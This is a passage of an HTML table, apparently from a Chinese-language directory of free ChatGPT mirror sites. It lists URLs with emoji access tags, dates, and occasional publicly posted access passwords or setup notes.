<td>20</td> <td> <a href="https://www.opkfc.com/" target="_blank">https://www.opkfc.com/</a> <br> </td> <td> 🆓 </td> <td>2024-06-29</td> <td></td> </tr> <tr> <td>21</td> <td> <a href="https://chatgpt4online.org/chatgpt-free-online/#chat" target="_blank">https://chatgpt4online.org/chatgpt-free-online/#chat</a> <br> </td> <td> 🆓 </td> <td>2024-06-13</td> <td></td> </tr> <tr> <td>22</td> <td> <a href="https://chatgptplus.cn/" target="_blank">https://chatgptplus.cn/</a> <br> </td> <td> 🆓 </td> <td>2024-06-01</td> <td></td> </tr> <tr> <td>23</td> <td> <a href="https://www.51supergpt.com/" target="_blank">https://www.51supergpt.com/</a> <br> </td> <td> 🆓 </td> <td>2024-05-30</td> <td>GPT3.5 授权码 51supergpt.com</td> </tr> <tr> <td>24</td> <td> <a href="https://tudouai.chat/chat" target="_blank">https://tudouai.chat/chat</a> <br> </td> <td> 🆓 </td> <td>2024-05-28</td> <td></td> </tr> <tr> <td>25</td> <td> <a href="https://robot.liujiarong.me" target="_blank">https://robot.liujiarong.me</a> <br> </td> <td> 🆓 </td> <td>2024-05-27</td> <td></td> </tr> <tr> <td>26</td> <td> <a href="https://robot.liujiarong.top" target="_blank">https://robot.liujiarong.top</a> <br> </td> <td> 🆓 </td> <td>2024-05-18</td> <td></td> </tr> <tr> <td>27</td> <td> <a href="https://chat.mynanian.top/" target="_blank">https://chat.mynanian.top/</a> <br> </td> <td> 🆓 </td> <td>2024-05-11</td> <td></td> </tr> <tr> <td>28</td> <td> <a href="https://free.icoding.ink/index2.html" target="_blank">https://free.icoding.ink/index2.html</a> <br> </td> <td> 🆓 </td> <td>2024-05-11</td> <td></td> </tr> <tr> <td>29</td> <td> <a href="https://chat.programapps.top/" target="_blank">https://chat.programapps.top/</a> <br> </td> <td> 🆓 </td> <td>2024-04-16</td> <td></td> </tr> <tr> <td>30</td> <td> <a href="https://chat.1-ai.sbs/" target="_blank">https://chat.1-ai.sbs/</a> <br> </td> <td> 🆓 </td> <td>2024-03-15</td> <td></td> </tr> <tr> <td>31</td> <td> <a href="https://ichuang.top" target="_blank">https://ichuang.top</a> <br> </td> <td> 🆓 </td> <td>2024-03-09</td> <td></td> </tr> <tr> <td>32</td> <td> <a href="https://ai.daladada.xyz/" target="_blank">https://ai.daladada.xyz/</a> <br> </td> <td> 🆓 </td> <td>2024-03-01</td> <td></td> </tr> <tr> <td>33</td> <td> <a href="https://ai.wendabao.net" target="_blank">https://ai.wendabao.net</a> <br> </td> <td> 🆓 </td> <td>2024-02-04</td> <td></td> </tr> <tr> <td>34</td> <td> <a href="https://chat.gptchatai.life/" target="_blank">https://chat.gptchatai.life/</a> <br> </td> <td> 🆓 </td> <td>2024-01-04</td> <td></td> </tr> <tr> <td>35</td> <td> <a href="https://promptboom.com/PowerChat/PowerChatTalk" target="_blank">https://promptboom.com/PowerChat/PowerChatTalk</a> <br> </td> <td> 🆓 </td> <td>2024-01-01</td> <td></td> </tr> <tr> <td>36</td> <td> <a href="https://1.bixin123.com" target="_blank">https://1.bixin123.com</a> <br> </td> <td> 🆓 </td> <td>2023-12-28</td> <td></td> </tr> <tr> <td>37</td> <td> <a href="https://chat.leapgpt.top/" target="_blank">https://chat.leapgpt.top/</a> <br> </td> <td> 🆓 </td> <td>2023-11-09</td> <td>登录码 leap@gpt+</td> </tr> <tr> <td>38</td> <td> <a href="https://hai.dongstop.link/" target="_blank">https://hai.dongstop.link/</a> <br> </td> <td> 🆓 </td> <td>2023-10-19</td> <td></td> </tr> <tr> <td>39</td> <td> <a href="https://zz.aifree.site/" target="_blank">https://zz.aifree.site/</a> <br> </td> <td> 🆓 </td> <td>2023-10-17</td> <td></td> </tr> <tr> <td>40</td> <td> <a href="https://chat.aiearth.dev/" target="_blank">https://chat.aiearth.dev/</a> <br> </td> <td> 🆓 </td> 
<td>2023-10-11</td> <td>设置中输入访问密码 freegpt3</td> </tr> <tr> <td>41</td> <td> <a href="https://academic.aiearth.dev/" target="_blank">https://academic.aiearth.dev/</a> <br> </td> <td> 🆓 </td> <td>2023-10-11</td> <td></td> </tr> <tr> <td>42</td> <td> <a href="https://cgs.skybyte.me/" target="_blank">https://cgs.skybyte.me/</a> <br> </td> <td> 🆓 </td> <td>2023-10-09</td> <td></td> </tr> <tr> <td>43</td> <td> <a href="http://decentrealizedweb.xyz/chat/bot" target="_blank">http://decentrealizedweb.xyz/chat/bot</a> <br> </td> <td> 🆓 </td> <td>2023-08-29</td> <td></td> </tr> <tr> <td>44</td> <td> <a href="https://aibn.cc/" target="_blank">https://aibn.cc/</a> <br> </td> <td> 🆓 </td> <td>2023-08-29</td> <td></td> </tr> <tr> <td>45</td> <td> <a href="https://chatgptduo.com/" target="_blank">https://chatgptduo.com/</a> <br> </td> <td> 🆓 </td> <td>2023-08-25</td> <td></td> </tr> <tr> <td>46</td> <td> <a href="https://chatp.free2gpt.xyz/" target="_blank">https://chatp.free2gpt.xyz/</a> <br> </td> <td> 🆓 </td> <td>2023-08-24</td> <td></td> </tr> <tr> <td>47</td> <td> <a href="http://chatgpt.bybyte.cn/" target="_blank">http://chatgpt.bybyte.cn/</a> <br> </td> <td> 🆓 </td> <td>2023-08-14</td> <td></td> </tr> <tr> <td>48</td> <td> <a href="https://chat.leadscloud.xyz/" target="_blank">https://chat.leadscloud.xyz/</a> <br> </td> <td> 🆓 </td> <td>2023-08-14</td> <td></td> </tr> <tr> <td>49</td> <td> <a href="http://gptgo.ai/" target="_blank">http://gptgo.ai/</a> <br> </td> <td> 🆓 </td> <td>2023-08-07</td> <td></td> </tr> <tr> <td>50</td> <td> <a href="https://powerchat.top/" target="_blank">https://powerchat.top/</a> <br> </td> <td> 🆓 </td> <td>2023-08-06</td> <td></td> </tr> <tr> <td>51</td> <td> <a href="https://f.aifree.site/" target="_blank">https://f.aifree.site/</a> <br> </td> <td> 🆓 </td> <td>2023-08-01</td> <td></td> </tr> <tr> <td>52</td> <td> <a href="https://ai.qidianym.net/" target="_blank">https://ai.qidianym.net/</a> <br> </td> <td> 🆓 </td> <td>2023-07-31</td> <td></td> </tr> <tr> <td>53</td> <td> <a href="https://gpt.freet.top" target="_blank">https://gpt.freet.top</a> <br> </td> <td> 🆓 </td> <td>2023-07-29</td> <td></td> </tr> <tr> <td>54</td> <td> <a href="https://www.chatfree.cc/" target="_blank">https://www.chatfree.cc/</a> <br> </td> <td> 🆓 </td> <td>2023-07-25</td> <td></td> </tr> <tr> <td>55</td> <td> <a href="https://chat.aifree.site/" target="_blank">https://chat.aifree.site/</a> <br> </td> <td> 🆓 </td> <td>2023-07-20</td> <td></td> </tr> <tr> <td>56</td> <td> <a href="https://chatz.free2gpt.xyz/" target="_blank">https://chatz.free2gpt.xyz/</a> <br> </td> <td> 🆓 </td> <td>2023-07-13</td> <td></td> </tr> <tr> <td>57</td> <td> <a href="http://c.newstop.uk" target="_blank">http://c.newstop.uk</a> <br> </td> <td> 🆓 </td> <td>2023-07-12</td> <td></td> </tr> <tr> <td>58</td> <td> <a href="https://openai.aifree.site/" target="_blank">https://openai.aifree.site/</a> <br> </td> <td> 🆓 </td> <td>2023-07-11</td> <td></td> </tr> <tr> <td>59</td> <td> <a href="https://ai.azstudio.top/" target="_blank">https://ai.azstudio.top/</a> <br> </td> <td> 🆓 </td> <td>2023-07-10</td> <td></td> </tr> <tr> <td>60</td> <td> <a href="https://ai.zenglingkun.cn/" target="_blank">https://ai.zenglingkun.cn/</a> <br> </td> <td> 🆓 </td> <td>2023-07-10</td> <td></td> </tr> <tr> <td>61</td> <td> <a href="https://chatgpt.kiask.xyz/" target="_blank">https://chatgpt.kiask.xyz/</a> <br> </td> <td> 🆓 </td> <td>2023-07-09</td> <td></td> </tr> <tr> <td>62</td> <td> <a href="https://chat.acytoo.com/" 
target="_blank">https://chat.acytoo.com/</a> <br> </td> <td> 🆓 </td> <td>2023-07-01</td> <td></td> </tr> <tr> <td>63</td> <td> <a href="http://g01.plitun.com/" target="_blank">http://g01.plitun.com/</a> <br> </td> <td> 🆓 </td> <td>2023-06-29</td> <td></td> </tr> <tr> <td>64</td> <td> <a href="https://c1ns.cn/chat/" target="_blank">https://c1ns.cn/chat/</a> <br> </td> <td> 🆓 </td> <td>2023-06-26</td> <td></td> </tr> <tr> <td>65</td> <td> <a href="https://newstop.c1ns.cn/" target="_blank">https://newstop.c1ns.cn/</a> <br> </td> <td> 🆓 </td> <td>2023-06-25</td> <td></td> </tr> <tr> <td>66</td> <td> <a href="https://gpt.aifree.site/" target="_blank">https://gpt.aifree.site/</a> <br> </td> <td> 🆓 </td> <td>2023-06-24</td> <td></td> </tr> <tr> <td>67</td> <td> <a href="https://hteyun.com/" target="_blank">https://hteyun.com/</a> <br> </td> <td> 🆓 </td> <td>2023-06-23</td> <td></td> </tr> <tr> <td>68</td> <td> <a href="https://chat.weuseing.com/" target="_blank">https://chat.weuseing.com/</a> <br> </td> <td> 🆓 </td> <td>2023-06-17</td> <td></td> </tr> <tr> <td>69</td> <td> <a href="https://zyq-chatgpt.github.io" target="_blank">https://zyq-chatgpt.github.io</a> <br> </td> <td> 🆓 </td> <td>2023-06-16</td> <td></td> </tr> <tr> <td>70</td> <td> <a href="http://chat.aisoftworks.com" target="_blank">http://chat.aisoftworks.com</a> <br> </td> <td> 🆓 </td> <td>2023-06-15</td> <td></td> </tr> <tr> <td>71</td> <td> <a href="https://gptdidi.com/" target="_blank">https://gptdidi.com/</a> <br> </td> <td> 🆓 </td> <td>2023-06-14</td> <td></td> </tr> <tr> <td>72</td> <td> <a href="http://chat.darkflow.top/" target="_blank">http://chat.darkflow.top/</a> <br> </td> <td> 🆓 </td> <td>2023-06-13</td> <td></td> </tr> <tr> <td>73</td> <td> <a href="https://chat.flares.ai/" target="_blank">https://chat.flares.ai/</a> <br> </td> <td> 🆓 </td> <td>2023-06-08</td> <td></td> </tr> <tr> <td>74</td> <td> <a href="https://devgpt.com/" target="_blank">https://devgpt.com/</a> <br> </td> <td> 🆓 </td> <td>2023-06-08</td> <td></td> </tr> <tr> <td>75</td> <td> <a href="https://chat.newstop.asia/" target="_blank">https://chat.newstop.asia/</a> <br> </td> <td> 🆓 </td> <td>2023-06-06</td> <td></td> </tr> <tr> <td>76</td> <td> <a href="https://nb8.c1ns.cn/" target="_blank">https://nb8.c1ns.cn/</a> <br> </td> <td> 🆓 </td> <td>2023-06-02</td> <td></td> </tr> <tr> <td>77</td> <td> <a href="https://chatyou.lovebaby.today/" target="_blank">https://chatyou.lovebaby.today/</a> <br> </td> <td> 🆓 </td> <td>2023-06-01</td> <td></td> </tr> <tr> <td>78</td> <td> <a href="https://www.magicaibot.com/talk" target="_blank">https://www.magicaibot.com/talk</a> <br> </td> <td> 🆓 </td> <td>2023-06-01</td> <td></td> </tr> <tr> <td>79</td> <td> <a href="https://521.zeabur.app/" target="_blank">https://521.zeabur.app/</a> <br> </td> <td> 🆓 </td> <td>2023-06-01</td> <td></td> </tr> <tr> <td>80</td> <td> <a href="https://chat.kunshanyuxin.com/" target="_blank">https://chat.kunshanyuxin.com/</a> <br> </td> <td> 🆓 </td> <td>2023-05-31</td> <td></td> </tr> <tr> <td>81</td> <td> <a href="https://chat.jubianxingqiu.com/" target="_blank">https://chat.jubianxingqiu.com/</a> <br> </td> <td> 🆓 </td> <td>2023-05-31</td> <td></td> </tr> <tr> <td>82</td> <td> <a href="https://a.aiask.me/" target="_blank">https://a.aiask.me/</a> <br> </td> <td> 🆓 </td> <td>2023-05-26</td> <td></td> </tr> <tr> <td>83</td> <td> <a href="https://ai.gptforlove.com/" target="_blank">https://ai.gptforlove.com/</a> <br> </td> <td> 🆓 </td> <td>2023-05-26</td> <td></td> </tr> <tr> <td>84</td> <td> 
<a href="https://as1.betai55.uk/" target="_blank">https://as1.betai55.uk/</a> <br> </td> <td> 🆓 </td> <td>2023-05-25</td> <td>设置中输入访问密码 586-482-535B</td> </tr> <tr> <td>85</td> <td> <a href="https://chat.pinkfong.cn/" target="_blank">https://chat.pinkfong.cn/</a> <br> </td> <td> 🆓 </td> <td>2023-05-18</td> <td></td> </tr> <tr> <td>86</td> <td> <a href="https://ai.heptax.com/" target="_blank">https://ai.heptax.com/</a> <br> </td> <td> 🆓 </td> <td>2023-04-30</td> <td></td> </tr> <tr> <td>87</td> <td> <a href="https://index.chat.bnu120.space/" target="_blank">https://index.chat.bnu120.space/</a> <br> </td> <td> 🆓 </td> <td>2023-04-28</td> <td></td> </tr> <tr> <td>88</td> <td> <a href="https://f12.xjai.cc/" target="_blank">https://f12.xjai.cc/</a> <br> </td> <td> 🆓 </td> <td>2023-04-27</td> <td></td> </tr> <tr> <td>89</td> <td> <a href="https://nav4ai.net/chatgptweb" target="_blank">https://nav4ai.net/chatgptweb</a> <br> </td> <td> 🆓 </td> <td>2023-04-19</td> <td></td> </tr> <tr> <td>90</td> <td> <a href="https://mirrorchat.extkj.cn/" target="_blank">https://mirrorchat.extkj.cn/</a> <br> </td> <td> 🆓 </td> <td>2023-04-18</td> <td></td> </tr> <tr> <td>91</td> <td> <a href="https://chat13.xeasy.me/" target="_blank">https://chat13.xeasy.me/</a> <br> </td> <td> 🆓 </td> <td>2023-04-11</td> <td></td> </tr> <tr> <td>92</td> <td> <a href="https://dev.yqcloud.top/" target="_blank">https://dev.yqcloud.top/</a> <br> </td> <td> 🆓 </td> <td>2023-03-22</td> <td></td> </tr> <tr> <td>93</td> <td> <a href="https://www.promptboom.com/" target="_blank">https://www.promptboom.com/</a> <br> </td> <td> 🆓 🌎 🧰 </td> <td>2023-04-24</td> <td></td> </tr> <tr> <td>94</td> <td> <a href="https://chatgptfree.ai/" target="_blank">https://chatgptfree.ai/</a> <br> </td> <td> 🆓 🌎 </td> <td>2024-06-13</td> <td></td> </tr> <tr> <td>95</td> <td> <a href="https://chatcat.zhaoyoung.me" target="_blank">https://chatcat.zhaoyoung.me</a> <br> </td> <td> 🆓 🌎 </td> <td>2023-06-04</td> <td>设置中输入访问密码 chatcat</td> </tr> <tr> <td>96</td> <td> <a href="https://ai.mcbbs.gq/" target="_blank">https://ai.mcbbs.gq/</a> <br> </td> <td> 🆓 🌎 </td> <td>2023-05-28</td> <td></td> </tr> <tr> <td>97</td> <td> <a href="https://ai.gogpt.site/" target="_blank">https://ai.gogpt.site/</a> <br> </td> <td> 🆓 🌎 </td> <td>2023-05-26</td> <td></td> </tr> <tr> <td>98</td> <td> <a href="https://aichat.gogpt.site/" target="_blank">https://aichat.gogpt.site/</a> <br> </td> <td> 🆓 🌎 </td> <td>2023-05-26</td> <td></td> </tr> <tr> <td>99</td> <td> <a href="https://vvanglro.eu.org/" target="_blank">https://vvanglro.eu.org/</a> <br> </td> <td> 🆓 🌎 </td> <td>2023-05-23</td> <td></td> </tr> <tr> <td>100</td> <td> <a href="http://chat1.manongzyg.one/" target="_blank">http://chat1.manongzyg.one/</a> <br> </td> <td> 🆓 🌎 </td> <td>2023-05-17</td> <td>设置中输入访问密码 857857</td> </tr> <tr> <td>101</td> <td> <a href="https://pro.ai.ls/" target="_blank">https://pro.ai.ls/</a> <br> </td> <td> 🆓 🌎 </td> <td>2023-04-26</td> <td></td> </tr> <tr> <td>102</td> <td> <a href="https://www.aitianhu.com/" target="_blank">https://www.aitianhu.com/</a> <br> </td> <td> 🆓 🌎 </td> <td>2023-04-20</td> <td></td> </tr> <tr> <td>103</td> <td> <a href="https://chatcat.pages.dev/" target="_blank">https://chatcat.pages.dev/</a> <br> </td> <td> 🆓 🌎 </td> <td>2023-04-11</td> <td>设置中输入访问密码 chatcat</td> </tr> <tr> <td>104</td> <td> <a href="https://chat2.geekr.dev/" target="_blank">https://chat2.geekr.dev/</a> <br> </td> <td> 🆓 🌎 </td> <td>2023-04-04</td> <td></td> </tr> <tr> <td>105</td> <td> <a 
href="https://ailink.icu/" target="_blank">https://ailink.icu/</a> <br> </td> <td> 🆓 🌎 </td> <td>2023-04-03</td> <td></td> </tr> <tr> <td>106</td> <td> <a href="https://desk.im/" target="_blank">https://desk.im/</a> <br> </td> <td> 🆓 🌎 </td> <td>2023-03-22</td> <td></td> </tr> <tr> <td>107</td> <td> <a href="https://ai.ls/" target="_blank">https://ai.ls/</a> <br> </td> <td> 🆓 🌎 </td> <td>2023-03-22</td> <td></td> </tr> <tr> <td>108</td> <td> <a href="https://ai.ci/" target="_blank">https://ai.ci/</a> <br> </td> <td> 🆓 🌎 </td> <td>2023-03-22</td> <td></td> </tr> <tr> <td>109</td> <td> <a href="https://chat2.xeasy.me/" target="_blank">https://chat2.xeasy.me/</a> <br> </td> <td> 🆓 🌎 </td> <td>2023-03-22</td> <td></td> </tr> <tr> <td>110</td> <td> <a href="https://gpt.xeasy.me/" target="_blank">https://gpt.xeasy.me/</a> <br> </td> <td> 🆓 🌎 </td> <td>2023-03-22</td> <td></td> </tr> <tr> <td>111</td> <td> <a href="https://gpt.getshare.net/" target="_blank">https://gpt.getshare.net/</a> <br> </td> <td> 🆓 🌎 </td> <td>2023-03-22</td> <td></td> </tr> <tr> <td>112</td> <td> <a href="http://chatai.fyi/" target="_blank">http://chatai.fyi/</a> <br> </td> <td> 🆓 🌎 </td> <td>2023-03-22</td> <td></td> </tr> <tr> <td>113</td> <td> <a href="https://chat.51buygpt.com/" target="_blank">https://chat.51buygpt.com/</a> <br> </td> <td> 🆓 🌎 </td> <td>2023-03-22</td> <td></td> </tr> <tr> <td>114</td> <td> <a href="https://trychatgp.com/" target="_blank">https://trychatgp.com/</a> <br> </td> <td> 🆓 🌎 </td> <td>2023-03-22</td> <td></td> </tr> <tr> <td>115</td> <td> <a href="https://chat12.xeasy.me/" target="_blank">https://chat12.xeasy.me/</a> <br> </td> <td> 🆓 🌎 </td> <td>2023-03-10</td> <td></td> </tr> <tr> <td>116</td> <td> <a href="https://chatgpt.dairoot.cn/" target="_blank">https://chatgpt.dairoot.cn/</a> <br> </td> <td> 🔓 💪 🧰 </td> <td>2024-07-02</td> <td></td> </tr> <tr> <td>117</td> <td> <a href="https://site.eqing.tech/" target="_blank">https://site.eqing.tech/</a> <br> </td> <td> 🔓 💪 🧰 </td> <td>2024-06-07</td> <td></td> </tr> <tr> <td>118</td> <td> <a href="https://free2.nbmj.xyz/" target="_blank">https://free2.nbmj.xyz/</a> <br> </td> <td> 🧰 </td> <td>2024-05-24</td> <td>Midjourney</td> </tr> <tr> <td>119</td> <td> <a href="https://newchat.hklan.top/" target="_blank">https://newchat.hklan.top/</a> <br> </td> <td> 🔓 💪 🧰 </td> <td>2023-12-09</td> <td></td> </tr> <tr> <td>120</td> <td> <a href="https://t1.c1ns.cn/" target="_blank">https://t1.c1ns.cn/</a> <br> </td> <td> 🔓 💪 🧰 </td> <td>2023-06-20</td> <td></td> </tr> <tr> <td>121</td> <td> <a href="https://webai.gpt-666.com" target="_blank">https://webai.gpt-666.com</a> <br> </td> <td> 🔓 💪 </td> <td>2023-09-05</td> <td></td> </tr> <tr> <td>122</td> <td> <a href="https://likeyouto.cloudns.biz/" target="_blank">https://likeyouto.cloudns.biz/</a> <br> </td> <td> 🔓 🧰 </td> <td>2023-11-08</td> <td></td> </tr> <tr> <td>123</td> <td> <a href="http://www.airight.fun/" target="_blank">http://www.airight.fun/</a> <br> </td> <td> 🔓 🧰 </td> <td>2023-08-04</td> <td></td> </tr> <tr> <td>124</td> <td> <a href="https://unifyai.cn/" target="_blank">https://unifyai.cn/</a> <br> </td> <td> 🔓 🧰 </td> <td>2023-07-25</td> <td></td> </tr> <tr> <td>125</td> <td> <a href="https://chatgpt.hklan.top/" target="_blank">https://chatgpt.hklan.top/</a> <br> </td> <td> 🔓 🧰 </td> <td>2023-07-21</td> <td></td> </tr> <tr> <td>126</td> <td> <a href="https://deepai.org/" target="_blank">https://deepai.org/</a> <br> </td> <td> 🔓 🧰 </td> <td>2023-06-29</td> <td></td> </tr> <tr> <td>127</td> <td> 
<a href="https://aixforce.app/" target="_blank">https://aixforce.app/</a> <br> </td> <td> 🔓 🧰 </td> <td>2023-05-29</td> <td></td> </tr> <tr> <td>128</td> <td> <a href="https://www.perplexity.ai/" target="_blank">https://www.perplexity.ai/</a> <br> </td> <td> 🔓 💪 🌎 </td> <td>2023-08-27</td> <td></td> </tr> <tr> <td>129</td> <td> <a href="https://99.opao.xyz/" target="_blank">https://99.opao.xyz/</a> <br> </td> <td> 🔓 </td> <td>2023-07-02</td> <td></td> </tr> <tr> <td>130</td> <td> <a href="http://www.tdchat.pro/" target="_blank">http://www.tdchat.pro/</a> <br> </td> <td> 🔓 </td> <td>2023-05-05</td> <td></td> </tr> <tr> <td>131</td> <td> <a href="https://chat.zhulei.xyz/" target="_blank">https://chat.zhulei.xyz/</a> <br> </td> <td> 🔓 </td> <td>2023-04-21</td> <td></td> </tr> <tr> <td>132</td> <td> <a href="https://chatplus.buzz" target="_blank">https://chatplus.buzz</a> <br> </td> <td> 🔑 💪 🧰 </td> <td>2023-07-10</td> <td></td> </tr> <tr> <td>133</td> <td> <a href="https://www.typingmind.com/" target="_blank">https://www.typingmind.com/</a> <br> </td> <td> 🔑 💪 🧰 </td> <td>2023-03-26</td> <td></td> </tr> <tr> <td>134</td> <td> <a href="https://caffcat.com" target="_blank">https://caffcat.com</a> <br> </td> <td> 🔑 💪 </td> <td>2023-08-15</td> <td></td> </tr> <tr> <td>135</td> <td> <a href="https://www.jinwangyile.xyz" target="_blank">https://www.jinwangyile.xyz</a> <br> </td> <td> 🔑 💪 </td> <td>2023-08-15</td> <td></td> </tr> <tr> <td>136</td> <td> <a href="https://bettergpt.chat/" target="_blank">https://bettergpt.chat/</a> <br> </td> <td> 🆓 🔑 🌎 </td> <td>2023-05-26</td> <td><details> <summary>内容过长,点击展开</summary> 免费操作步骤:转到 API 设置并选择“使用自定义 API 端点”。然后,输入 https://free.churchless.tech/v1/chat/completions 作为端点,并将 API 密钥字段留空。 </details></td> </tr> <tr> <td>137</td> <td> <a href="https://chatgpt-cn.co/" target="_blank">https://chatgpt-cn.co/</a> <br> </td> <td> 🔓 🌎 </td> <td>2023-04-23</td> <td></td> </tr> <tr> <td>138</td> <td> <a href="https://chatforai.com/" target="_blank">https://chatforai.com/</a> <br> </td> <td> 🔓 🌎 </td> <td>2023-03-22</td> <td></td> </tr> <tr> <td>139</td> <td> <a href="https://ai.okmiku.com/chat" target="_blank">https://ai.okmiku.com/chat</a> <br> </td> <td> 🔓 🌎 </td> <td>2023-03-22</td> <td></td> </tr> <tr> <td>140</td> <td> <a href="https://beta.aicatgirl.com/" target="_blank">https://beta.aicatgirl.com/</a> <br> </td> <td> 🔑 </td> <td>2023-11-21</td> <td></td> </tr> <tr> <td>141</td> <td> <a href="https://free.aitom.cc/" target="_blank">https://free.aitom.cc/</a> <br> </td> <td> 🔑 </td> <td>2023-09-12</td> <td></td> </tr> <tr> <td>142</td> <td> <a href="https://nb.aitom.cc" target="_blank">https://nb.aitom.cc</a> <br> </td> <td> 🔑 </td> <td>2023-09-03</td> <td></td> </tr> <tr> <td>143</td> <td> <a href="https://coffeecat.ai" target="_blank">https://coffeecat.ai</a> <br> </td> <td> 🔑 </td> <td>2023-08-03</td> <td></td> </tr> <tr> <td>144</td> <td> <a href="https://freegpt.dingtoucake.xyz/" target="_blank">https://freegpt.dingtoucake.xyz/</a> <br> </td> <td> 🔑 </td> <td>2023-07-26</td> <td></td> </tr> <tr> <td>145</td> <td> <a href="https://freegpt.cc/" target="_blank">https://freegpt.cc/</a> <br> </td> <td> 🔑 🌎 💪 </td> <td>2023-03-22</td> <td></td> </tr> <tr> <td>146</td> <td> <a href="https://robotai.liujiarong.top" target="_blank">https://robotai.liujiarong.top</a> <br> </td> <td> 🔒 💪 🧰 </td> <td>2024-08-14</td> <td></td> </tr> <tr> <td>147</td> <td> <a href="https://www.llmchathub.fun/" target="_blank">https://www.llmchathub.fun/</a> <br> </td> <td> 🔒 💪 🧰 </td> 
<td>2024-08-04</td> <td></td> </tr> <tr> <td>148</td> <td> <a href="https://ssgpt.chat/" target="_blank">https://ssgpt.chat/</a> <br> </td> <td> 🔒 💪 🧰 </td> <td>2024-08-01</td> <td></td> </tr> <tr> <td>149</td> <td> <a href="https://chatof.ai" target="_blank">https://chatof.ai</a> <br> </td> <td> 🔒 💪 🧰 </td> <td>2024-07-23</td> <td></td> </tr> <tr> <td>150</td> <td> <a href="https://search.100ai.fun" target="_blank">https://search.100ai.fun</a> <br> </td> <td> 🔒 💪 🧰 </td> <td>2024-07-19</td> <td></td> </tr> <tr> <td>151</td> <td> <a href="https://www.aicnn.cn/oaifree" target="_blank">https://www.aicnn.cn/oaifree</a> <br> </td> <td> 🔒 💪 🧰 </td> <td>2024-07-18</td> <td></td> </tr> <tr> <td>152</td> <td> <a href="https://usergpt.top" target="_blank">https://usergpt.top</a> <br> </td> <td> 🔒 💪 🧰 </td> <td>2024-07-15</td> <td></td> </tr> <tr> <td>153</td> <td> <a href="https://www.bfbke.com/chatgpt" target="_blank">https://www.bfbke.com/chatgpt</a> <br> </td> <td> 🔒 💪 🧰 </td> <td>2024-07-04</td> <td></td> </tr> <tr> <td>154</td> <td> <a href="https://all.xjai.top" target="_blank">https://all.xjai.top</a> <br> </td> <td> 🔒 💪 🧰 </td> <td>2024-07-01</td> <td></td> </tr> <tr> <td>155</td> <td> <a href="https://zhijianai.com.cn/chat" target="_blank">https://zhijianai.com.cn/chat</a> <br> </td> <td> 🔒 💪 🧰 </td> <td>2024-06-22</td> <td></td> </tr> <tr> <td>156</td> <td> <a href="https://assistant.old-eight.top/#/chat/1002" target="_blank">https://assistant.old-eight.top/#/chat/1002</a> <br> </td> <td> 🔒 💪 🧰 </td> <td>2024-06-09</td> <td></td> </tr> <tr> <td>157</td> <td> <a href="https://www.allyfy.chat/" target="_blank">https://www.allyfy.chat/</a> <br> </td> <td> 🔒 💪 🧰 </td> <td>2024-05-31</td> <td></td> </tr> <tr> <td>158</td> <td> <a href="https://web.sydney-ai.com" target="_blank">https://web.sydney-ai.com</a> <br> </td> <td> 🔒 💪 🧰 </td> <td>2024-05-21</td> <td>免费共享账户:maomi 密码:maomimaomi</td> </tr> <tr> <td>159</td> <td> <a href="https://3am.com.hk" target="_blank">https://3am.com.hk</a> <br> </td> <td> 🔒 💪 🧰 </td> <td>2024-05-19</td> <td></td> </tr> <tr> <td>160</td> <td> <a href="http://ai.omegaxyz.cn/" target="_blank">http://ai.omegaxyz.cn/</a> <br> </td> <td> 🔒 💪 🧰 </td> <td>2024-05-16</td> <td></td> </tr> <tr> <td>161</td> <td> <a href="https://ai.dfcsf.asia/" target="_blank">https://ai.dfcsf.asia/</a> <br> </td> <td> 🔒 💪 🧰 </td> <td>2024-04-18</td> <td></td> </tr> <tr> <td>162</td> <td> <a href="https://vip.talktoai.club/chat" target="_blank">https://vip.talktoai.club/chat</a> <br> </td> <td> 🔒 💪 🧰 </td> <td>2024-01-26</td> <td></td> </tr> <tr> <td>163</td> <td> <a href="https://chat.anchongai.com" target="_blank">https://chat.anchongai.com</a> <br> </td> <td> 🔒 💪 🧰 </td> <td>2024-01-16</td> <td></td> </tr> <tr> <td>164</td> <td> <a href="https://www.tomchat.fun" target="_blank">https://www.tomchat.fun</a> <br> </td> <td> 🔒 💪 🧰 </td> <td>2024-01-16</td> <td></td> </tr> <tr> <td>165</td> <td> <a href="https://www.atalk-ai.com/" target="_blank">https://www.atalk-ai.com/</a> <br> </td> <td> 🔒 💪 🧰 </td> <td>2024-01-10</td> <td></td> </tr> <tr> <td>166</td> <td> <a href="http://nmwaicg.top/" target="_blank">http://nmwaicg.top/</a> <br> </td> <td> 🔒 💪 🧰 </td> <td>2023-12-05</td> <td></td> </tr> <tr> <td>167</td> <td> <a href="https://ai7.pro" target="_blank">https://ai7.pro</a> <br> </td> <td> 🔒 💪 🧰 </td> <td>2023-12-05</td> <td></td> </tr> <tr> <td>168</td> <td> <a href="https://shaopchat.com" target="_blank">https://shaopchat.com</a> <br> </td> <td> 🔒 💪 🧰 </td> <td>2023-12-03</td> <td></td> 
</tr> <tr> <td>169</td> <td> <a href="https://shaopchat.com" target="_blank">https://shaopchat.com</a> <br> </td> <td> 🔒 💪 🧰 </td> <td>2023-11-27</td> <td></td> </tr> <tr> <td>170</td> <td> <a href="https://www.ealxc.cn" target="_blank">https://www.ealxc.cn</a> <br> </td> <td> 🔒 💪 🧰 </td> <td>2023-11-08</td> <td></td> </tr> <tr> <td>171</td> <td> <a href="https://ai.haydenstudio.hk/" target="_blank">https://ai.haydenstudio.hk/</a> <br> </td> <td> 🔒 💪 🧰 </td> <td>2023-10-16</td> <td></td> </tr> <tr> <td>172</td> <td> <a href="https://api.aiearth.dev/" target="_blank">https://api.aiearth.dev/</a> <br> </td> <td> 🔒 💪 🧰 </td> <td>2023-10-11</td> <td></td> </tr> <tr> <td>173</td> <td> <a href="https://botqna.com/" target="_blank">https://botqna.com/</a> <br> </td> <td> 🔒 💪 🧰 </td> <td>2023-10-09</td> <td></td> </tr> <tr> <td>174</td> <td> <a href="https://chat.ai-zc.com/" target="_blank">https://chat.ai-zc.com/</a> <br> </td> <td> 🔒 💪 🧰 </td> <td>2023-10-08</td> <td></td> </tr> <tr> <td>175</td> <td> <a href="https://api.daifuku.cloud/" target="_blank">https://api.daifuku.cloud/</a> <br> </td> <td> 🔒 💪 🧰 </td> <td>2023-10-06</td> <td></td> </tr> <tr> <td>176</td> <td> <a href="https://aigc.kungfu.wang/" target="_blank">https://aigc.kungfu.wang/</a> <br> </td> <td> 🔒 💪 🧰 </td> <td>2023-09-23</td> <td></td> </tr> <tr> <td>177</td> <td> <a href="https://chat.gptwecan.com/chat" target="_blank">https://chat.gptwecan.com/chat</a> <br> </td> <td> 🔒 💪 🧰 </td> <td>2023-09-19</td> 